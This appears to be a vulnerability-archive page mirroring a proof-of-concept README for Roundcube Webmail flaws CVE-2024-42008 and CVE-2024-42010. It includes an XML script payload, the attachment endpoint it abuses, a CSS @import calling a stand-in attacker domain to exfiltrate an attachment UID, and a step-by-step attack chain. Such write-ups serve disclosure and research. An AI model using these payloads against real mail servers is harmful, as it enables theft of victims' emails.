Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-42008 PoC — Roundcube Webmail 安全漏洞

Source
https://github.com/victoni/Roundcube-CVE-2024-42008-and-CVE-2024-42010-POC
Associated Vulnerability
Title:Roundcube Webmail 安全漏洞 (CVE-2024-42008)
Description:A Cross-Site Scripting vulnerability in rcmail_action_mail_get->run() in Roundcube through 1.5.7 and 1.6.x through 1.6.7 allows a remote attacker to steal and send emails of a victim via a malicious e-mail attachment served with a dangerous Content-Type header.
Description
POCof Roundcube vulnerabilities CVE-2024-42008 and CVE-2024-42010
Readme
### Proof of Concept: CVE-2024-42008 and CVE-2024-42010

This proof of concept (PoC) demonstrates the exploitation of two vulnerabilities in Roundcube Webmail that enable CSS injection and a cross-site scripting (XSS). The attack consists of two stages:

1. **XSS via malicious XML attachment (CVE-2024-42008)**
    
    Because of insufficient file upload checks, an XML file can be sent as an attachment with JavaScript code e.g.
    
    ```xml
    <something:script xmlns:something="<http://www.w3.org/1999/xhtml>">
    	alert(origin)
    </something:script>
    ```
    
    This was a known issue and tracked as CVE-2020-13965 and the mitigation was to disable the "Open attachment" option. But the file can still be accessed through the endpoint
    
    ```
    https://roundcube.host.com/?_task=mail&_mbox=INBOX&_uid=[UID]&_part=2&_download=0&_action=get
    ```
    
    Where UID is the unique identifier for this particular attachment in this particular mailbox (i.e. INBOX).
    ![](xss.png)
    
3. **HTML exfiltration via CSS injection (CVE-2024-42010)**
    
    When sending an email, it is possible to injection your own CSS file, when hosted in a domain that starts with `a`. Through that and a JavaScript server file that processes the requests made by the vulnerable Roundcube host, it is possible to extract the UID of the malicious XSS attachment.
    
    Import the CSS in a sent email with
    
    ```css
    <style>
    	@import "//a.attackerdomain.com/start?"
    </style>
    ```
    
    Host the JS server (roundcube-css-exploit.js) that exfiltrates the UID of the malicious attachment
    ![](css.png)

**Attack Chain**
 1. Host in your domain the JavaScript server
 2. Send an email with a malicious XML attachment and import the CSS from your domain
 3. The victim opens the email and the UID gets exfiltrated
 4. Then, depending on the preferred way of the XSS delivery you can either send a second email with the attachment link or redirect the user through there.

**Source: [Government Emails at Risk: Critical Cross-Site Scripting Vulnerability in Roundcube Webmail (Sonar's Vulnerability Research Team)](https://www.sonarsource.com/blog/government-emails-at-risk-critical-cross-site-scripting-vulnerability-in-roundcube-webmail/)**
File Snapshot

 [4.0K]  /data/pocs/011c8ae6a886f6dee6dec9936e8e8f055aa91f42
├── [208K]  css.png
├── [2.2K]  README.md
├── [3.1K]  roundcube-css-exploit.js
└── [ 98K]  xss.png

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →